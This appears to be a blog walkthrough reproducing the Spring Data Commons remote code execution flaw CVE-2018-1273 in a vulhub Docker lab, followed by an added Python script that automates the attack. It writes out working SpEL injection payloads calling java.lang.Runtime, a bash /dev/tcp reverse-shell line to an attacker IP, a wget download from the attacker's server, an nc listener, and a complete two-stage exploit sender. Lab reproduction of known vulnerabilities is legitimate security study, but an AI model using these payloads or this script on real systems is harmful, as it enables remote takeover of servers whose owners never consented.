Reproducing the Spring Data Commons remote command execution vulnerability (CVE-2018-1273)

1. Vulnerability Description
Spring Data is an open source framework that simplifies database access and supports cloud services. It consists of modules such as Commons, Gemfire, JPA, JDBC and MongoDB. This vulnerability lies in the Spring Data Commons component, which provides the shared base framework used by the other sub-projects and supports cross-database persistence.

Spring Data Commons contains a remote code execution vulnerability: its MapDataBinder evaluated property paths taken from request parameter names as SpEL expressions using a StandardEvaluationContext. An attacker who submits a form whose parameter name carries a malicious SpEL expression gets that expression evaluated on the server, can run arbitrary commands through java.lang.Runtime, and so takes control of the host.
2. Affected versions
Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10)
Spring Data REST 2.6 - 2.6.10 (Ingalls SR10)
Spring Data Commons 2.0 - 2.0.5 (Kay SR5)
Spring Data REST 3.0 - 3.0.5 (Kay SR5)
Older, unsupported versions are also affected. The fix shipped in Spring Data Commons 1.13.11 (Ingalls SR11) and 2.0.6 (Kay SR6), and in Spring Data REST 2.6.11 and 3.0.6.
3. Set up the environment
cd vulhub/spring/CVE-2018-1273
docker-compose up -d

4. Vulnerability Reproduction
1. Prepare the reverse-shell command
Write the following line to a file named shell.sh (192.168.155.2 is the attacker machine and 1111 is the port the listener will use):
bash -i >& /dev/tcp/192.168.155.2/1111 0>&1

2. Start an HTTP server
In the directory containing shell.sh, run:
python -m http.server 8081

3. Capture the request
Visit http://192.168.25.128:8080/users, fill in the registration form, submit it, and intercept the resulting POST with Burp Suite.

4. Prepare the request bodies
Payload template (the SpEL expression sits in the parameter name; the parameter value is irrelevant):
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("<command to execute>")]=&password=&repeatedPassword=
Download request body (fetches shell.sh from the attacker's HTTP server):
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh")]=&password=test&repeatedPassword=test
Execute request body:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("/bin/bash /tmp/1.sh")]=&password=test&repeatedPassword=test
Runtime.exec(String) splits the command on whitespace and does not go through a shell, so shell quoting and redirection inside the exec string do not work; that is why the script is first downloaded and then run in two separate requests instead of one quoted bash -c command.
5. Start the nc listener on the attacker machine, on the port used in shell.sh:
nc -lvnp 1111

6. Send the request bodies
Send the download request first.

1.sh now appears in /tmp on the target.

Then send the execute request.

7. Reverse shell
The nc listener receives a connection back from the target and drops into an interactive bash session.
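The whole procedure above, automated as one script. This is an added example and is not part of the original post or of vulhub: it builds the two request bodies (URL-encoded, which the servlet container decodes before Spring binds the parameters), POSTs them in order, and refuses commands that would break the SpEL string literal. TARGET, ATTACKER_HTTP and the use of plain urllib are assumptions for this lab; only spel_for, build_body and decoded_name run offline, and the network part only runs when the script is executed directly.

```python
"""Two-stage CVE-2018-1273 request builder and sender (added example).

TARGET and ATTACKER_HTTP are assumed lab addresses taken from the
walkthrough; edit them for your own environment.
"""
import urllib.error
import urllib.parse
import urllib.request

# Assumed addresses (placeholders for this lab, not from any screenshot).
TARGET = "http://192.168.25.128:8080/users"
ATTACKER_HTTP = "http://192.168.155.2:8081/shell.sh"

# The SpEL that MapDataBinder evaluated when it saw it in a property path.
SPEL_TEMPLATE = (
    '#this.getClass().forName("java.lang.Runtime").getRuntime().exec("{cmd}")'
)


def spel_for(cmd: str) -> str:
    """Return the SpEL expression that runs `cmd` through java.lang.Runtime.

    Runtime.exec(String) splits on whitespace only, so `cmd` must not rely on
    shell quoting; a double quote would also terminate the SpEL string literal,
    so such commands are rejected rather than sent broken.
    """
    if '"' in cmd:
        raise ValueError("double quotes would terminate the SpEL string literal")
    return SPEL_TEMPLATE.format(cmd=cmd)


def build_body(cmd: str) -> str:
    """Build the application/x-www-form-urlencoded body for one command.

    The expression goes into the parameter *name* (username[...]), because
    that is the property path the vulnerable binder evaluates; the value is
    irrelevant. urlencode percent-encodes [ ] # ( ) and quotes, and the
    container decodes them again before Spring sees the parameter.
    """
    fields = [
        (f"username[{spel_for(cmd)}]", ""),
        ("password", "test"),
        ("repeatedPassword", "test"),
    ]
    return urllib.parse.urlencode(fields)


def decoded_name(body: str) -> str:
    """The first parameter name as the servlet container hands it to Spring."""
    return urllib.parse.unquote_plus(body.split("&", 1)[0].split("=", 1)[0])


def send(body: str, target: str = TARGET) -> int:
    """POST the body and return the HTTP status.

    The command runs during binding, so the status says little about success;
    check /tmp on the target (or the listener) as the walkthrough does.
    """
    req = urllib.request.Request(
        target,
        data=body.encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


if __name__ == "__main__":
    # Stage 1 fetches shell.sh, stage 2 runs it; no shell features needed.
    stages = [
        f"/usr/bin/wget -O /tmp/1.sh {ATTACKER_HTTP}",
        "/bin/bash /tmp/1.sh",
    ]
    for cmd in stages:
        print(f"[*] {cmd} -> HTTP {send(build_body(cmd))}")
```

Run it with the nc listener already started; the two POSTs replace steps 6 and 7 of the manual procedure, and decoded_name() is handy for confirming in Burp that what the server receives is exactly the username[...] property path the walkthrough shows.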

Note:
Correct usage of wget -O:
The -O option writes the download to the given path instead of the remote file name, which is why the download payload above uses wget -O /tmp/1.sh. For example:
wget -O /usr/software https://download.redis.io/releases/redis-6.0.8.tar.gz

Source: blog.csdn.net/wutiangui/article/details/132790803